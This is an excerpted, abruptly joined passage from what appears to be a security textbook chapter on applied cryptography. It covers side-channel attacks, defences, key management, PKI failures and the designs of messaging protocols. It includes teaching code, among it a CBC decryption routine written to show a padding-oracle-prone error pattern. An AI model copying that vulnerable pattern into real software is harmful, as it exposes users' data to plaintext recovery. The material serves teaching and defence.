An alternative approach to taming complexity is to use mechanised tools, letting a computer
do the heavy lifting. However, the currently available tools are quite difficult to use and require
human intervention and, more often than not, input from the tool designer. One of the more
successful approaches here is to use a symbolic model of the cryptographic primitives
rather than a computational one as we have been considering so far. This provides a level of
abstraction that enables more complex protocols to be considered, but which misses some
of the subtleties of the computational approach. Symbolic approaches to formal analysis are
covered in more detail in Formal Methods for Security Knowledge Area (Chapter 13).
OpenSSL’s code development is done in this way. As part of its support model, a crypto-
graphic library should have a clear process for notifying its maintainers of bugs and security
vulnerabilities. The library’s developers should commit to address these in a timely manner.
their hacks. An issue here is that the resulting code could be released with the testing
mode still enabled, but one would hope that regular software assurance would detect
this before release.
9. Code that uses the API should be easy to read and maintain. For example, iteration counts for password hashing should not be set by a developer via the API, but instead set internally by the library (a sketch follows below). One issue here is that the internal defaults may be overkill and hurt performance in some use cases. This relates to the tension between flexibility and security.
10. The API should assist with or handle end user interaction, rather than leave the entire
burden of this to the developer using the API. Here, error messages are highlighted
as a particular concern by Green and Smith: the API and the library documentation
should help developers understand what failure modes the library has, what the security
consequences of these are and how the resulting errors should be handled by the calling
code.
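A minimal sketch of the API style advocated in item 9, where the iteration count is owned by the library rather than the caller (function names and parameter values here are illustrative, not from any real library):

    import hashlib, hmac, os

    _ITERATIONS = 600_000          # internal default, chosen and updated by the library

    def hash_password(password: str) -> bytes:
        salt = os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)
        return salt + digest       # caller never sees or sets the iteration count

    def verify_password(password: str, stored: bytes) -> bool:
        salt, digest = stored[:16], stored[16:]
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)
        return hmac.compare_digest(candidate, digest)

    record = hash_password("correct horse battery staple")
    assert verify_password("correct horse battery staple", record)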
For additional references and discussion, see Human Factors Knowledge Area (Section 4.6.2).
As we noted in Section 18.1.6, the usual security goal of an AEAD scheme does not guarantee
that the length of plaintexts will be hidden. Indeed, AEAD schemes like AES-GCM make it
trivial to read off the plaintext length from the ciphertext length. However, it is clear that length
leakage can be fatal to security. Consider a simplistic secure trading system where a user
issues only two commands, “BUY” or “SELL”, with these commands being encoded in simple
ASCII and sent over a network under the protection of AES-GCM encryption. An adversary
sitting on the network who can intercept the encrypted communications can trivially infer what
commands a user is issuing, just by looking at ciphertext lengths (the ciphertexts for “SELL”
will be one byte longer than those for “BUY”). More generally, attacks based on traffic analysis
and on the analysis of metadata associated with encrypted data can result in significant
information leaking to an adversary.
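The BUY/SELL example can be reproduced in a few lines with AES-GCM (using the `cryptography` package); the AEAD scheme hides the content of each command but not its length:

    import os
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    key = AESGCM.generate_key(bit_length=128)
    aead = AESGCM(key)

    ct_buy = aead.encrypt(os.urandom(12), b"BUY", None)
    ct_sell = aead.encrypt(os.urandom(12), b"SELL", None)

    # GCM ciphertext length = plaintext length + 16-byte tag, so the two
    # commands remain distinguishable by length alone.
    assert len(ct_buy) == 3 + 16 and len(ct_sell) == 4 + 16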
The amount of time that it takes to execute the cryptographic code may leak information about
the internal processing steps of the algorithm. This may in turn leak sensitive information,
e.g. information about keys. The first public demonstration of this problem was made by
Kocher [1453] with the attacker having direct access to timing information. Later it was shown
that such attacks were even feasible remotely, i.e. could be carried out by an attacker located
at a different network location from the target, with timing information being polluted by
network noise [1679].
Consider for example a naive elliptic curve scalar multiplication routine which is optimised
to ignore leading zeros in the most significant bits of the scalar. Here we imagine the scalar
multiplication performing doubling and adding operations on points, with the operations being
determined by the bits of the scalar from most significant to least significant. If the adversary
can somehow time the execution of the scalar multiplication routine, it can detect cases where
the code finishes early and infer which scalars have some number of most significant bits
equal to zero. Depending on how the routine is used, this may provide enough side channel
information to enable a key to be recovered. This is the case, for example, for the ECDSA
scheme, where even partial leakage of random values can be exploited. Recent systematic
studies in this specific setting [1680, 1681] show that timing attacks are still pertinent today.
Errors arising during cryptographic processing can also leak information about internal pro-
cessing steps. Padding oracle attacks on CBC mode encryption, originally introduced in [1636],
provide a classic and persistent example of this phenomenon. CBC mode uses a block cipher
to encrypt plaintext data that is a multiple of the block cipher’s block length. But in applications,
we typically want to encrypt data of arbitrary length. This implies that data needs to be padded
to a block boundary of the block cipher before it can be encrypted by CBC mode. Vaudenay
observed that, during decryption, this padding needs to be removed, but the padding may be
invalidly formatted and the decryption code may produce an error message in this case. If the
adversary can somehow observe the error message, then it can infer something about the
padding’s validity. By carefully constructing ciphertexts and observing errors arising during
their decryption, an adversary can mount a plaintext recovery attack via this error side channel.
In practice, the error messages may themselves be encrypted, but then revealed via a sec-
ondary side channel, e.g. a timing side channel (since an implementation might abort fur-
ther processing once a padding error is encountered). For examples of this in the con-
text of SSL/TLS and which illustrate the difficulty of removing this class of side channel,
see [1637, 1682].
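The essence of the error side channel can be seen in the following sketch of a CBC decryption routine that reports which check failed (the exception names and the stub MAC check are illustrative; real attacks exploit exactly this kind of distinguishable failure, whether signalled directly or via timing):

    import os
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    class PaddingError(Exception): pass
    class MacError(Exception): pass

    def verify_mac(plaintext: bytes) -> bool:
        return True                      # stand-in for a real MAC check

    def cbc_decrypt_pkcs7(key: bytes, iv: bytes, ct: bytes) -> bytes:
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        padded = dec.update(ct) + dec.finalize()
        n = padded[-1]
        if n < 1 or n > 16 or padded[-n:] != bytes([n]) * n:
            raise PaddingError           # observable failure mode #1
        if not verify_mac(padded[:-n]):
            raise MacError               # observable failure mode #2
        return padded[:-n]

    key, iv = os.urandom(16), os.urandom(16)
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    ct = enc.update(b"attack at dawn\x02\x02") + enc.finalize()
    assert cbc_decrypt_pkcs7(key, iv, ct) == b"attack at dawn"

An adversary who can tell PaddingError apart from MacError when submitting chosen ciphertexts has precisely the oracle needed for Vaudenay-style plaintext recovery.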
The cryptographic code may not be running in perfect isolation from potential adversaries.
In particular, in modern CPUs there is a memory cache hierarchy in which the same fast
memory is shared between different processes, with each process potentially overwriting
portions of the cache used by other processes. For example, in a cloud computing scenario,
many different users’ processes may be running in parallel on the same underlying hardware,
even if they are separated by security techniques like virtualisation. So an attacker, running in
a separate process in the CPU, could selectively flush portions of the cache and then, after
the victim process has run some critical code, observe by timing its own cache accesses,
whether that part of the cache has been accessed by the victim process or not. If the victim
process has a pattern of memory access that is key-dependent, then this may indirectly leak
information about the victim’s key. This particular attack is known as a Flush+Reload attack
and was introduced in [1683]; several other forms of cache-based attack are known. The
possibility of such attacks was first described in [1684]; later such attacks were shown to be
problematic for AES in particular [1685].18 In the last few years, researchers have had a field
day developing cache-based and related micro-architectural attacks against cryptographic
implementations. These attacks arise in general from designers of modern CPUs making
architectural compromises in search of speed.
More prosaically, cryptographic keys may be improperly deleted after use, or accidentally
written to backup media. Plaintext may be improperly released to a calling application before
its integrity has been verified. This can occur in certain constructions where MAC verification
is done after decryption and also in streaming applications where only a limited-size buffer is
available for holding decrypted data.
A system making use of multiple cryptographic components may inadvertently leak sensitive
information through incorrect composition of those components. So we have leakage at a
system level rather than directly from the individual cryptographic components. Consider the
case of Zcash,19 an anonymous cryptocurrency. Zcash uses a combination of zero-knowledge
proofs, a PKE scheme and a commitment scheme in its transaction format. The PKE scheme
is used as an outer layer and is anonymous, so the identity of the intended recipient is shielded.
How then should a Zcash client decide if a transaction is intended for it? It has to perform a
trial decryption using its private key; if this fails, no further processing is carried out. Otherwise,
if decryption succeeds, then further cryptographic processing is done (e.g. the commitment
is checked). This creates a potentially observable difference in behaviour that breaks the
intended anonymity properties of Zcash [1686]. The PKE scheme used may be IND-CCA secure
and anonymous, but these atomic security properties do not suffice if the overall system’s
behaviour leaks the critical information.
18
See also https://cr.yp.to/antiforgery/cachetiming-20050414.pdf for contemporaneous but unpublished work.
19
See https://z.cash/.
Hardware implementations may also be vulnerable to fault or glitch attacks, where an error
is introduced into cryptographic computations at a precise moment resulting in leakage of
sensitive data (typically keys) via the output of the computation. The first such attack focused
on implementations of RSA using the CRT [1688]. A more recent incarnation of this form of
attack called Rowhammer targets the induction of faults in memory locations where keys are
stored by repeatedly writing to adjacent locations [989].
18.2.4 Defences
General techniques for defending against cryptographic implementation vulnerabilities (as
opposed to weaknesses in the algorithms and schemes themselves) come from the fields of
software and hardware security and are well-summarised in [1689, 1690]. Indeed, it can be
argued that conventional software security may be more important for cryptographic code
than for other forms of code. For hardware, blinding, masking, threshold techniques and
physical shielding are commonly used protections. For software, common techniques include
formal specification and verification of software and hardware designs, static and dynamic
analysis of code, fuzzing, information flow analysis, the use of domain-specific languages for
generating cryptographic code and the use of strong typing to model and enforce security
properties. Most of the software techniques are currently supported only by experimental
tools and are not at present widely deployed in production environments. Additionally, the
objects they analyse — and therefore the protections they offer — only extend so far, down to
code at Instruction Set Architecture level at best.
Length side channels can be closed by padding plaintexts to one of a set of predetermined
sizes before encryption and by adding cover or dummy traffic. Secure communications
protocols like SSL/TLS and IPsec have features supporting such operations, but these features
are not widely used in practice.
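A minimal sketch of one such defence, padding every plaintext up to the next multiple of a fixed bucket size before encryption so that ciphertext lengths reveal only the bucket, not the exact length (the marker-byte padding used here is illustrative):

    BUCKET = 256

    def pad_to_bucket(message: bytes) -> bytes:
        target = ((len(message) + 1 + BUCKET - 1) // BUCKET) * BUCKET
        return message + b"\x80" + b"\x00" * (target - len(message) - 1)

    def unpad(padded: bytes) -> bytes:
        return padded[:padded.rindex(b"\x80")]   # marker is the last 0x80 byte

    assert unpad(pad_to_bucket(b"BUY")) == b"BUY"
    assert len(pad_to_bucket(b"BUY")) == len(pad_to_bucket(b"SELL")) == 256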
A set of coding practices aim to achieve what is loosely called Constant-Time Cryptography.
The core idea is to remove, through careful programming, any correlation between the values
of sensitive data such as keys or plaintexts, and variables that can be observed by an adversary
such as execution time. This entails avoiding, amongst other things, key-dependent memory
accesses, key-dependent branching and certain low-level instructions whose running time
is operand-dependent. It may also require writing high-level code in particular ways so as to
prevent the compiler from optimising away constant-time protections.20 Writing constant-time
code for existing algorithms is non-trivial. In some cases, cryptographic designers have taken
it into account from the beginning when designing their algorithms. For example, Bernstein’s
ChaCha20 algorithm21 does so, while using certain coordinate systems makes it easier to
achieve constant-time implementation of elliptic curve algorithms [1691].
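As a small illustration of one such coding rule, compare a naive equality test on a MAC tag with a constant-time one. In many languages (and in general in Python), == on byte strings may exit at the first mismatching byte, so its running time can leak how long a prefix of the tag an attacker has guessed correctly:

    import hmac

    def leaky_check(tag: bytes, expected: bytes) -> bool:
        return tag == expected                       # may exit early on a mismatch

    def constant_time_check(tag: bytes, expected: bytes) -> bool:
        return hmac.compare_digest(tag, expected)    # scans all bytes regardless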
Pseudo-Random Number Generator, PRNG, using a seed derived from the entropy pool).
Designs of this type are standardised by NIST in [1672]. They are also used in most operating
systems but with a variety of ad hoc and hard-to-analyse constructions. Mature formal security
models and constructions for random bit generators do exist, see [1677] for a survey. But this
is yet another instance where practice initially got ahead of theory, then useful theory was
developed, and now practice is yet to fully catch up again.
It is challenging to estimate how much true randomness can be gathered from the aforemen-
tioned weak entropy sources. In some computing environments, such as embedded systems,
some or all of the sources may be absent, leading to slow filling of the entropy pool after
a reboot — leaving a “boot time entropy hole” [1693, 1694]. A related issue arises in Virtual
Machine (VM) environments, where repeated random bits may arise if they are extracted from
the Operating System too soon after a VM image is reset [1695].
There has been a long-running debate on whether such random bit generators should be
blocking or non-blocking: if the OS keeps a running estimate of how much true entropy remains
in the pool as output is consumed, then should the generator block further output being taken
if the entropy estimate falls below a certain threshold? The short answer is no, if we believe
we are using a cryptographically-secure PRNG to generate the output, provided the entropy
pool is properly initialised with enough entropy after boot. This is because we should trust our
PRNG to do a good job in generating output that is computationally indistinguishable from
random, even if not truly random. Some modern operating systems now offer an interface to
a random bit generator of this “non-blocking-if-properly-seeded” type.
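For example, on such systems an application can simply consume OS randomness directly (on Linux, the getrandom() system call underlies both of these Python interfaces):

    import os, secrets

    key = secrets.token_bytes(32)    # preferred high-level interface
    nonce = os.urandom(12)           # equivalent lower-level interface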
and server in a complex cryptographic protocol, perhaps with one party choosing the session
key and then making use of PKE to transport it to the other party.
Keys may also be derived from other keys using suitable cryptographic algorithms known as
Key Derivation Functions.
Keys need to be stored securely until they are needed. We discuss some of the main key
storage options in more detail in the sequel.
Then keys are actually used to protect data in some way. It may be necessary to impose limits
on how much data the keys are used to protect, due to intrinsic limitations of the cryptographic
scheme in which they are being used. Keys may then need to be changed or updated. For
example, the TLS specification in its latest version, TLS 1.3 [1480], contains recommendations
about how much data each AEAD key in the protocol can be used to protect. These are set
by analysing the security bounds for the employed AEAD schemes. TLS also features a key
update sub-protocol enabling new keys to be established within a secure connection.
Keys may need to be revoked if they are discovered to have been compromised. The revocation
status of keys must then be communicated to parties relying on those keys in a timely and
reliable manner.
Keys may also need to be archived — put into long-term, secure storage — enabling the data
they protect to be retrieved when needed. This may involve encrypting the keys under other
keys, which themselves require management. Finally, keys should be securely deleted at the
end of their lifetime. This may involve physical destruction of storage media, or carefully
overwriting keys.
Given the complexity in the key life-cycle, it should be apparent that the key life-cycle and its
attendant processes need to be carefully considered and documented as part of the design
process for any system making use of cryptography.
We have already hinted that keys in general need to remain secret in order to be useful (public keys are an exception; as we discuss below, the requirement for public keys is that they be securely bound to the identity of the key owner and to their function). Keys can leak in many ways —
through the key generation procedure due to poor randomness, whilst being transported to
the place where they will be needed, through compromise of the storage system on which they
reside, through side-channel attacks while in use, or because they are not properly deleted once
exhausted. So it may be profitable for attackers to directly target keys and their management
rather than the algorithms making use of them when trying to break a cryptographic system.
Additionally, it is good practice that keys come with what Martin [1620] calls assurance of
purpose — which party (or parties) can use the key, for which purposes and with what limits.
Certain storage formats — for example, digital certificates — encode this information along
with the keys. This relates to the principle of key separation which states that a given key
should only ever be used for one purpose (or in one cryptographic algorithm). This principle is
perhaps more often broken than observed and has led to vulnerabilities in deployed systems,
see, for example [1667, 1698].
the HSM offers to keys that it directly stores to a larger collection of keys. Consider the simple
case of using the HSM to store a Key Encryption Key (KEK), such that the HSM’s API allows
that key to be used internally for authorised encryption and decryption functions. Then the
HSM can be used to wrap and, when needed, unwrap many Data Encryption Keys (DEKs) using
a single KEK that is stored inside the HSM. Here wrapping means encrypting and unwrapping
means decrypting. Assuming the used encryption mechanism is strong, the wrapped DEKs
can be stored in general, unprotected memory. Further details on HSMs can be found in the
Hardware Security Knowledge Area (Chapter 20).
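A minimal sketch of the KEK/DEK pattern using the AES key wrap algorithm of RFC 3394 (via the `cryptography` package); in a real deployment the KEK would live inside the HSM and wrap/unwrap would be calls to the HSM’s API, whereas here everything runs locally for illustration:

    import os
    from cryptography.hazmat.primitives.keywrap import aes_key_wrap, aes_key_unwrap

    kek = os.urandom(32)                  # Key Encryption Key (held in the HSM)
    dek = os.urandom(32)                  # Data Encryption Key to be protected

    wrapped = aes_key_wrap(kek, dek)      # safe to keep in general, unprotected memory
    assert aes_key_unwrap(kek, wrapped) == dek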
TPMs also provide hardware-backed key storage. Technologies aiming to provide secure
execution environments, such as Intel SGX and ARM Trustzone, enable secure storage of
keys but also possess much more general capabilities. On mobile devices, the Android and
iOS operating systems offer similar key storage features through Android Keystore and iOS
Secure Enclave — both of these are essentially mini-HSMs.
to transport session keys, Diffie-Hellman key exchange achieves strictly stronger forward
security properties.
Complementing forward security is the notion of backward security, aka post-compromise security [1706]. This refers to the security of keys established after a key compromise has
occurred. Using Diffie-Hellman key exchange can help here too, to establish fresh session
keys, but only in the event that the adversary is restricted to being passive for at least one run
of the Diffie-Hellman protocol.
A suitable mechanism to bind public keys and identities — and possibly other information —
is needed. In early proposals for deploying Public Key Cryptography, it was proposed that this
could take the form of a trusted bulletin board, where all the public keys and corresponding
identities are simply listed. But this of course requires trust in the provider of the bulletin board
service.
A non-scalable and inflexible solution, but one that is commonly used in mobile applications
and IoT deployments, is to hard-code the required public key into the software of the party that
needs to use the public key. Here, security rests on the inability of an adversary to change the
public key by over-writing it in a local copy of the software, substituting it during a software
update, changing it in the code repository of the software provider, or by other means.
Another solution is to use public key digital certificates (or just certificates for short). These
are data objects in which the data includes identity, public key, algorithm type, issuance and
expiry dates, key usage restrictions and potentially other fields. In addition, the certificate
contains a digital signature, over all the other fields, of some Trusted Third Party (TTP) who
attests to the correctness of the information. This TTP is known as a Certification Authority
(CA). The most commonly used format for digital certificates is X.509 version 3 [1707].
The use of certificates moves the problem of verifying the binding implied by the digital signature in the certificate to the authentic distribution of the CA’s public key. In practice, the problem may be deferred several times via a certificate chain, with each TTP’s public key in
the chain being attested to via a certificate issued by a higher authority. Ultimately, this chain
is terminated at the highest level by a root certificate that is self-signed by a root CA. That is,
the root certificate contains the public verification key of the root CA and a signature that is
created using the matching private signing key. A party wishing to make use of a user-level
public key (called a relying party) must now verify a chain of certificates back to the root and
also have means of assuring that the root public key is valid. This last step is usually solved
by an out of band distribution of the root CA’s public key. Root CAs may also cross-sign each
other’s root certificates.
As an important and visible example of a PKI, consider the Web PKI. Web browser vendors
embed a list of the public keys of a few hundred different root CAs in their software and
update the list from time to time via their software update mechanisms, which in turn may
rely for its security on a separate PKI. Website owners pay to obtain certificates binding their
sites’ URLs to their public keys from subordinate CAs. Then, when running the TLS protocol
for secure communications between a web browser and a website, the website’s server sends
a certificate chain to the web browser client. The chain provides the web browser with a
copy of the server’s public key (in the lowest certificate from the chain, the leaf or end-entity
certificate) as well as a means of verifying the binding between the web site name in the form
of its URL, and that public key. The operations and conventions of the Web PKI are managed
by the CA/Browser Forum.28
In addition to needing a suitable binding mechanism, there must be a stable, controlled naming
mechanism for parties. Moreover, parties need to have means of proving to CAs that they own
a specific identity and CAs need to check such assertions. Equally, CAs need to be trusted
to only issue certificates to the correct parties. This aspect of PKI intersects heavily with
legal and regulatory aspects of Information Security and is covered in more detail in Law &
Regulation Knowledge Area (Section 3.10.3).
For the Web PKI, there have been numerous incidents where CAs were found to have mis-
issued certificates, either because they were hacked (e.g. DigiNotar29 ), because of poor
control over the issuance process (e.g. TurkTrust30 ), or because they were under the control
of governments who wished to gain surveillance capabilities over their citizens. This can lead
to significant commercial impacts for affected CAs: in DigiNotar’s case, the company went
bankrupt. In other cases, CAs were found to not be properly protecting their private signing
keys, leaving them vulnerable to hacking.31 In response to a growing number of such incidents,
Google launched the Certificate Transparency (CT) effort. CT provides an open framework for
monitoring and auditing certificates; it makes use of multiple, independent public logs in an
attempt to record all the certificates issued by browser-trusted CAs. The protocols and data
formats underlying CT are specified in [1708].32
Relying parties (i.e. parties verifying certificates and then using the embedded public keys)
need access to reliable time sources to be sure that the certificate’s lifetime, as encoded in
28
See https://cabforum.org/.
29
See https://en.wikipedia.org/wiki/DigiNotar.
30
See https://nakedsecurity.sophos.com/2013/01/08/the-turktrust-ssl-certificate-fiasco-what-happened-and-what-happens-next/.
31
See for example the case of CNNIC, https://techcrunch.com/2015/04/01/google-cnnic/.
32
See also https://certificate.transparency.dev/ for the project homepage.
the certificate, is still valid. Otherwise, an attacker could send an expired certificate for which
it has compromised the corresponding private key to a relying party and get the relying party
to use the certificate’s public key. This requirement can be difficult to fulfill in low-cost or
constrained environments, e.g. IoT applications.
Relying parties verifying certificates also need access to reliable, timely sources of information
about the status of certificates — whether the certificate is still valid or has been revoked for
some security or operational reason. This can be done by regularly sending lists of revoked
certificates to relying parties (known as Certificate Revocation Lists, CRLs), or having the
relying parties perform a real-time status check with the issuing CA before using the public
key using the Online Certificate Status Protocol, OCSP [1709]. The former approach is more
private for relying parties, since the check can be done locally, but implies the existence of a
window of exposure for relying parties between the time of revocation and the time of CRL
distribution. The latter approach provides more timely information but implies that large CAs
issuing many certificates need to provide significant bandwidth and computation to serve the
online requests.
In the web context, OCSP has become the dominant method for checking revocation status of
certificates. OCSP’s bandwidth issue is ameliorated by the practice of OCSP stapling, wherein
a web server providing a certificate regularly performs its own OCSP check and includes
the certified response from its CA along with its certificate. In an effort to further improve
user privacy, in 2020, Mozilla experimentally deployed33 an approach called CRLite developed
in [1710] in their Firefox browser. CRLite uses CT logs and other sources of information to
create timely and compact CRLs for regular distribution to web browsers.
The software at a relying party that validates certificate chains needs to work properly. This
is non-trivial, given the complexity of the X.509 data structures involved, the use of complex
encoding languages and the need to accurately translate security policy into running code.
There have been numerous failures. A prominent and entirely avoidable example is Apple’s
“goto fail” from 2014. Here a repeated line of code34 for error handling in Apple’s certificate
verification code in its SSL/TLS implementation caused all certificate checking to be bypassed.
This made it trivial to spoof a web server’s public key in a fake certificate to clients running
Apple’s code. This resulted in a total bypass of the server authentication in Apple’s SSL/TLS
implementation, undermining all security guarantees of the protocol.35
The certificate industry has been slow to react to advances in the cryptanalysis of algorithms
and slow to add support for new signature schemes. The story of SHA-1 and its gradual
removal from the Web PKI is a prime example. This relates to the discussion of cryptographic
agility in Section 18.1.14. The first cracks in SHA-1 appeared in 2005 [1711]. Already at this
point, cryptographers, taking their standard conservative approach, recommended that SHA-1
be deprecated in applications requiring collision resistance. From 2005 onwards, the crypt-
analysis of SHA-1 was refined and improved. Finally in 2017, the first public collisions for
33
See https://blog.mozilla.org/security/2020/01/09/crlite-part-1-all-web-pki-revocations-compressed/.
34
The offending line of code was literally “goto fail”.
35
See https://dwheeler.com/essays/apple-goto-fail.html for a detailed write-up of the incident and its implications
for Apple’s software development processes.
SHA-1 were exhibited [1712]. This was followed in 2019 by a chosen-prefix collision attack
that directly threatened the application of SHA-1 in certificates [1713]. However, despite the
direction of travel having been clear for more than a decade, it took until 2017 before the
major web browsers finally stopped accepting SHA-1 in Web PKI certificates. Today, SHA-1
certificates are still to be found in payment systems and elsewhere. The organisations run-
ning these systems are inherently change-averse because they have to manage complex
systems that must continue to work across algorithm and technology changes. In short, these
organisations are not cryptographically agile, as discussed in Section 18.1.14.
The web of trust is an alternative to hierarchical PKIs in which the users in a system vouch for
the authenticity of one another’s public keys by essentially cross-certifying each other’s keys.
It was once popular in the PGP community but did not catch on elsewhere. Such a system
poses significant usability challenges for ordinary users [347].
Identity-Based Cryptography (IBC) [1714] offers a technically appealing alternative to traditional
Public Key Cryptography in which users’ private keys are derived directly from their identities
by a TTP called the Trusted Authority (TA) in possession of a master private key. The benefit
is that there is no need to distribute public keys; a relying party now needs only to know an
identity and have an authentic copy of the TA’s public key. The down-side for many applica-
tion domains is that trust in the TA is paramount, since it has the capability to forge users’
signatures and decrypt ciphertexts intended for them through holding the master private
key. On the other hand, IBC’s built-in key escrow property may be useful in corporate security
applications. Certificateless Cryptography [1715] tries to strike a balance between traditional
PKI and IBC. These and other related concepts have sparked a lot of scientific endeavour, but
little deployment to date.
and showing that it is visually scrambled by the algorithm. (Of course, image data is ultimately
represented by bits and standard cryptographic algorithms operate on those bits.) Other topics
common in such papers are chaos-based cryptography and combining multiple schemes
(RSA, ElGamal, etc) to make a stronger one. The activity of generating such papers is a waste
of time for the authors and reviewers alike, while it misleads students involved in writing the
papers about the true nature of cryptography as a research topic.
This author has seen multiple examples where complete outsiders to the field have been
persuaded to invest in cryptographic technologies which either defy the laws of information
theory or which fall to the “kitchen sink” fallacy of cryptographic design — push the data
through enough complicated steps and it must be secure. Another classic design error is for
an inventor to fall under the spell of the “large keys” fallacy: if an algorithm has a very large
key space, then surely it must be secure? Certainly a large enough key space is necessary
for security, but it is far from sufficient. A third fallacy is that of “friendly cryptanalysis”: the
inventor has tried to break the new algorithm themselves, so it must be secure. There is no
substitute for independent analysis.
Usually these technologies are invented by outsiders to the field. They may have received
encouragement from someone who is a consumer of cryptography but not themselves an
expert or someone who is too polite to deliver a merciful blow. Significant effort may be
required to dissuade the original inventors and their backers from taking the technology
further. A sometimes useful argument to deploy in such cases is that, while the inventor’s
idea may or may not be secure, we already have available standardised, carefully-vetted,
widely-deployed, low-cost solutions to the problem and so it will be hard to commercialise the
invention in a heavily commoditised area.
Another set of issues arise when software developers, perhaps with the best of intentions and
under release deadline pressure, “roll their own crypto”. Maybe having taken an introductory
course in Information Security or Cryptography at Bachelor’s level, they have accrued enough
knowledge not to try to make their own low-level algorithms and they know they can use
an API to a cryptographic library to get access to basic encryption and signing functions.
However, with today’s cryptographic libraries, it is easy to accidentally misuse the API and
end up with an insecure system. Likely the developer wants to do more than simply encrypt some plaintext data, and instead needs to plug together a collection of cryptographic primitives to achieve something more complex. This can lead to the “kitchen sink”
fallacy at the system level. Then there is the question of how the developer’s code should deal
with key management — recall that cryptographic schemes only shift the problem of securing
data to that of securing keys. Unfortunately, key management is rarely taught to Bachelor’s
students as a first class issue and this author has seen that basic issues like hard-coded keys
are still found on a regular basis in deployed cryptographic software.
Apple’s iMessage system historically used an ad hoc signcryption scheme that was shown to
have significant vulnerabilities in [1727]. This was despite signcryption being a well-known
primitive with well-established models, generic constructions from PKE and digital signatures
and security proofs in the academic literature. Conjecturally, the designers of Apple’s scheme
were constrained by the functions available in their cryptographic library. The Apple system
relied fully on trust in Apple’s servers to distribute authentic copies of users’ public keys — a
PKI by fiat. The system was designed to be end-to-end secure, meaning that without active
impersonation via key substitution, Apple could not read users’ messages. It did not enjoy
any forward-security properties, however: once a user’s private decryption key was known, all
messages intended for that user could be read. Note that Apple’s iMessage implementation
is not open source; the above description is based on the reverse engineering carried out
in [1727] and so may no longer be accurate.
18.5.2.2 Signal
The Signal design, which is used in both Signal and WhatsApp, takes a slightly different ap-
proach in the two-party case. It uses a kind of asynchronous DHKE approach called ratcheting.
At a high level, every time Alice sends user Bob a new message, she also includes a Diffie-
Hellman (DH) value and updates her symmetric key to one derived from that DH value and the
DH value she most recently received from Bob. On receipt, Bob combines the incoming DH
value with the one he previously sent to make a new symmetric key on his side. This key is
called a chaining key.
For each message that Alice sends to Bob without receiving a reply from Bob, she derives
two new keys from the current chaining key by applying a KDF (based on HKDF) to it; one key
is used as the next chaining key, the other is used to encrypt the current message. This is
also called ratcheting by the Signal designers and the combination of ratcheting applied to
both DH values and symmetric keys is called double ratcheting.40 This mechanism provides
forward security for Signal messages, despite its asynchronous nature. It also provides post-
compromise security. The use of ratcheting, however, entails problems with synchronisation:
if a message is lost between Alice and Bob, then their keys will end up in different states. This
is solved by keeping caches of recent chaining keys.
40
See https://signal.org/docs/specifications/doubleratchet/ for a concise overview of the process.
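To make the symmetric half of the ratchet concrete, the following Python fragment gives a simplified sketch (assuming the cryptography package; this illustrates the idea, not Signal's actual key schedule):

```python
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

def ratchet(chain_key: bytes) -> tuple[bytes, bytes]:
    """One symmetric ratchet step: stretch the current chaining key into 64
    bytes and split them into the next chaining key and a message key."""
    okm = HKDF(algorithm=hashes.SHA256(), length=64, salt=None,
               info=b"toy-ratchet").derive(chain_key)
    return okm[:32], okm[32:]

ck = b"\x11" * 32          # initial chaining key, from the DH ratchet
ck, mk1 = ratchet(ck)      # key for message 1
ck, mk2 = ratchet(ck)      # key for message 2; deleting mk1 and the old
                           # chaining keys is what yields forward security
```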
For symmetric encryption, Signal uses a simple generic AE construction based on EtM, relying
on CBC mode using AES with 256-bit keys for the “E” component and HMAC with SHA-256 for
the “M” component. This is a conservative and well-understood design.
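A minimal sketch of such an EtM construction, assuming the same cryptography package and the parameter choices described above (AES-256-CBC plus HMAC-SHA-256); Signal's actual implementation differs in its details:

```python
import os
from cryptography.hazmat.primitives import hashes, hmac, padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def encrypt_then_mac(enc_key: bytes, mac_key: bytes, plaintext: bytes) -> bytes:
    # "E" component: AES-256 in CBC mode with a fresh random IV.
    iv = os.urandom(16)
    padder = padding.PKCS7(128).padder()
    padded = padder.update(plaintext) + padder.finalize()
    encryptor = Cipher(algorithms.AES(enc_key), modes.CBC(iv)).encryptor()
    ciphertext = iv + encryptor.update(padded) + encryptor.finalize()
    # "M" component: HMAC-SHA-256 over the whole ciphertext, IV included.
    mac = hmac.HMAC(mac_key, hashes.SHA256())
    mac.update(ciphertext)
    return ciphertext + mac.finalize()
```

Note the use of two independent keys for the “E” and “M” components: exactly the key separation that Telegram, discussed below, lacks.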
Authentication in Signal is ultimately the same as in iMessage: it depends on trust in the server.
The idea is that users register a collection of DH values at the server; these are fetched by other
users and used to establish initial chaining keys. However, a malicious server could replace
these values and thereby mount a MitM attack. The use of human-readable key fingerprints
provides mitigation against this attack.
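Fingerprint comparison is conceptually simple: both parties derive a short, human-readable string from the public-key material and compare it out of band. A hypothetical Python sketch (Signal's actual “safety numbers” are computed differently):

```python
import hashlib

def fingerprint(pub_a: bytes, pub_b: bytes) -> str:
    """Derive a short human-readable string from both parties' public keys.
    Sorting makes the result independent of who computes it; both phones
    display the same digits if, and only if, no key substitution occurred."""
    digest = hashlib.sha256(min(pub_a, pub_b) + max(pub_a, pub_b)).hexdigest()
    digits = f"{int(digest[:16], 16) % 10**15:015d}"
    return " ".join(digits[i:i + 5] for i in range(0, 15, 5))
```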
A formal security analysis of the double ratcheting process used by Signal can be found
in [444]. Note that, in order to tame complexity, this analysis does not treat the composition of
the double ratchet with the symmetric encryption component. The Signal design has spurred a
spate of recent research into the question of what is the best possible security one can achieve
in two-party messaging protocols and how that security interacts with the synchronisation
issues.
18.5.2.3 Telegram
A third design is that used by Telegram.41 It is notable for the way it combines various crypto-
graphic primitives (RSA, finite field DHKE, a hash-based key derivation function, a hash-based
MAC and a non-standard encryption mode called IGE). Moreover, it does not have proper
key separation: keys used to protect messages from Alice to Bob share many overlapping
bits with keys used in the opposite direction, and those key bits are taken directly from
“raw” DHKE values. These features present significant barriers to formal analysis and violate
cryptographic best practices. Furthermore, Telegram does not universally feature end-to-end
encryption; rather it has two modes, one of which is end-to-end secure, the other of which
